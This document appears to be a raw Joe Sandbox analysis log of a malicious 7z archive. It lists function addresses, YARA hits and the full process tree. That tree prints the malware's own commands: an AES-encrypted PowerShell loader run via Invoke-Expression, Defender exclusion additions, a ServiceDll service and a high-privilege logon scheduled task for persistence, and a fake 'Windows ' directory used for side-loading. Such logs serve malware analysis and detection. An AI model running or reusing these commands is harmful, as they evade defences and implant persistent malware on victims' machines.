Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA41884C14 46_2_00007FFA41884C14
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA41861B28 46_2_00007FFA41861B28
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA417C6E50 46_2_00007FFA417C6E50
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA417DBDF0 46_2_00007FFA417DBDF0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA41877D70 46_2_00007FFA41877D70
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA417EED60 46_2_00007FFA417EED60
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA41863CBC 46_2_00007FFA41863CBC
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA41832CE0 46_2_00007FFA41832CE0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA41861D34 46_2_00007FFA41861D34
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA417D0FF0 46_2_00007FFA417D0FF0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA417EDF80 46_2_00007FFA417EDF80
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA41875EEC 46_2_00007FFA41875EEC
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA41861F38 46_2_00007FFA41861F38
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3310E3C0 51_2_00007FFA3310E3C0
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3312F430 51_2_00007FFA3312F430
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3312B470 51_2_00007FFA3312B470
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA330F2380 51_2_00007FFA330F2380
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA330F01D0 51_2_00007FFA330F01D0
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA330F1180 51_2_00007FFA330F1180
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA33133180 51_2_00007FFA33133180
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA33132780 51_2_00007FFA33132780
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3312B790 51_2_00007FFA3312B790
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA330F2610 51_2_00007FFA330F2610
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA330FC620 51_2_00007FFA330FC620
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA33116660 51_2_00007FFA33116660
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA330ED660 51_2_00007FFA330ED660
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA331176B0 51_2_00007FFA331176B0
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA331284F0 51_2_00007FFA331284F0
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA331184C0 51_2_00007FFA331184C0
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA33134530 51_2_00007FFA33134530
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA33138570 51_2_00007FFA33138570
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA33116C3E 51_2_00007FFA33116C3E
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA33101AC0 51_2_00007FFA33101AC0
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA330E2B20 51_2_00007FFA330E2B20
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3311BA80 51_2_00007FFA3311BA80
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3313BA86 51_2_00007FFA3313BA86
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA330E7EE0 51_2_00007FFA330E7EE0
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA33118E60 51_2_00007FFA33118E60
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA33125D00 51_2_00007FFA33125D00
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA5112817D 51_2_00007FFA5112817D
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA51121520 51_2_00007FFA51121520
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA511277AB 51_2_00007FFA511277AB
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA51122A10 51_2_00007FFA51122A10
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA5112794B 51_2_00007FFA5112794B
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA5112D080 51_2_00007FFA5112D080
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Windows\System32\libcrypto-3-x64.dll DCC1FA1A341597DDB1476E3B5B3952456F07870A26FC30B0C6E6312764BAA1FC
Found potential string decryption / allocating functions
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FFA2CF176EA appears 38 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FFA2CE583C0 appears 71 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FFA2CE58330 appears 65 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FFA2CEAE896 appears 148 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FFA2CEAE8A2 appears 128 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FFA2CEAE926 appears 36 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FFA2CEAE10A appears 59 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FFA2CEAE104 appears 461 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FFA2CEAEDF0 appears 844 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FFA2CEAE27E appears 39 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FFA417C5170 appears 56 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FFA2CEAE278 appears 32 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FFA2CF11AB0 appears 77 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FFA2CE68FD0 appears 105 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FFA2CEAE1CA appears 1339 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FFA2CF02CD0 appears 48 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FFA2CEAE0FE appears 63 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FFA2CF02D70 appears 260 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FFA2CF02C50 appears 63 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FFA4186D450 appears 310 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FFA417C53A0 appears 31 times
Source: C:\Windows\System32\console_zero.exe Code function: String function: 00007FFA331203F0 appears 47 times
Source: C:\Windows\System32\console_zero.exe Code function: String function: 00007FFA331298E0 appears 82 times
Source: C:\Windows\System32\console_zero.exe Code function: String function: 00007FFA330F3190 appears 327 times
Source: C:\Windows\System32\console_zero.exe Code function: String function: 00007FFA33111800 appears 42 times
Source: C:\Windows\System32\console_zero.exe Code function: String function: 00007FFA33111920 appears 39 times
Source: C:\Windows\System32\console_zero.exe Code function: String function: 00007FFA330F32A0 appears 47 times
Source: C:\Windows\System32\console_zero.exe Code function: String function: 00007FFA33129870 appears 35 times
Source: C:\Windows\System32\console_zero.exe Code function: String function: 00007FFA330F30A0 appears 445 times
PE file contains more sections than normal
Source: libiconv-2.dll.31.dr Static PE information: Number of sections : 20 > 10
Source: libintl-9.dll.31.dr Static PE information: Number of sections : 20 > 10
Source: libwinpthread-1.dll.31.dr Static PE information: Number of sections : 12 > 10
Uses reg.exe to modify the Windows registry
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f
Yara signature match
Source: Process Memory Space: powershell.exe PID: 3740, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.expl.evad.win7Z@86/50@3/4
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CF13E00 LoadLibraryExA,GetLastError,memset,FormatMessageA,strerror,libintl_gettext, 46_2_00007FFA2CF13E00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1132:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3108:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:4388:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1112:120:WilError_03
Source: C:\Windows\System32\OpenWith.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6944:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5032:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1976:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2828:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5464:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4188:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6188:120:WilError_03
Source: C:\Program Files\7-Zip\7zFM.exe File created: C:\Users\user\AppData\Local\Temp\7zE4809A201 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" "
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\rootdir\x447823.vbs"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\explorer.exe
Source: unknown Process created: C:\Windows\explorer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\explorer.exe Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: F.7z ReversingLabs: Detection: 27%
Source: F.7z Virustotal: Detection: 31%
Source: svchost.exe String found in binary or memory: -start
Source: svchost.exe String found in binary or memory: -addr
Source: svchost.exe String found in binary or memory: ../../gettext-runtime/intl/loadmsgcat.c
Source: unknown Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: unknown Process created: C:\Program Files\7-Zip\7zFM.exe "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\user\Desktop\Fzip"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\rootdir\x447823.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\explorer.exe explorer "..\USB Drive"
Source: unknown Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy "C:\Windows\System32\printui.exe" "C:\Windows \System32" /Y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy "x249569.dat" "C:\Windows \System32" /Y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f && sc start x338625
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start x338625
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k DcomLaunch
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\console_zero.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\console_zero.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\explorer.exe explorer "..\USB Drive" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy "C:\Windows\System32\printui.exe" "C:\Windows \System32" /Y Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy "x249569.dat" "C:\Windows \System32" /Y Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe" Jump to behavior
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f && sc start x338625
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start x338625
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\console_zero.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\console_zero.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
Source: C:\Windows\System32\OpenWith.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
